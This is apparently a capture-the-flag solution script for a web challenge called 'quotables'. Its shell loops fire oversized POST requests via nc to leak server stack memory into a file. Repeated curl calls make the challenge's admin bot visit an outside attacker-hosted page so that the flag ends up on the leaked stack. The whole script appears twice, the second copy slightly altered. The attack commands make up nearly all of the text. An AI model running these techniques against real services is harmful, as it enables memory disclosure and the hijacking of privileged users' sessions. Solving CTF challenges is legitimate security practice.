terjanq/soluton_quotes.sh

## soluton_quotes.sh
# The main issue was that nullbytes were being blocked so we needed a chunk of stack
# that did not contain any null bytes
# The trick was to put a huge body into the POST /api/flag request so it will fill most of the stack with printable characters
# And then just leaking it

#In terminal 1 run (leaking the stack to the file, looking for Location: header
for j in {0..10}; do for i in {0..20}; do
   printf "POST /quotes/new HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9000\r\n\r\nattribute=&quote=$$$$$$$$$$$"
   | nc quotables.pwni.ng 1337 -q 1 >> aaa &; done; sleep 1; done


#In terminal 2 and 3 run (to steal admin's attention :P and get the flag on their behalf so it will be put on the stack)
for i in {0..20}; do curl http://quotables.pwni.ng:1337/report -d 'path=http://terjanq.cf/admin.html'; done
	# The main issue was that nullbytes were being blocked so we needed a chunk of stack
	# that did not contain any null bytes
	# The trick was to put a huge body into the POST /api/flag request so it will fill most of the stack with printable characters
	# And then just leaking it

	#In terminal 1 run (leaking the stack to the file, looking for Location: header
	for j in {0..10}; do for i in {0..20}; do
	printf "POST /quotes/new HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9000\r\n\r\nattribute=&quote=$$$$$$$$$$$"
	\| nc quotables.pwni.ng 1337 -q 1 >> aaa &; done; sleep 1; done


	#In terminal 2 and 3 run (to steal admin's attention :P and get the flag on their behalf so it will be put on the stack)
	for i in {0..20}; do curl http://quotables.pwni.ng:1337/report -d 'path=http://terjanq.cf/admin.html'; done